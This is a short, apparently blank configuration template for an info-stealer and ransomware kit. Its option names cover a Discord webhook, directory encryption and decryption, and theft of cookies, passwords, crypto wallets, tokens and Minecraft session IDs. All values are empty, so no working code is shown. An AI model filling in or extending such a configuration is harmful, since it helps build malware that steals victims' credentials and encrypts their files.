email='contact email'
discord_webhook=''
encrypt_directory=''
decrypt_directory=''
send_encrypted_files=''
skid_name=''
ransonware=''
cookie=''
passwords=''
streaming=''
crypto_wallets=''
tokens=''
minecraft_ssid=''
file_explorer=''


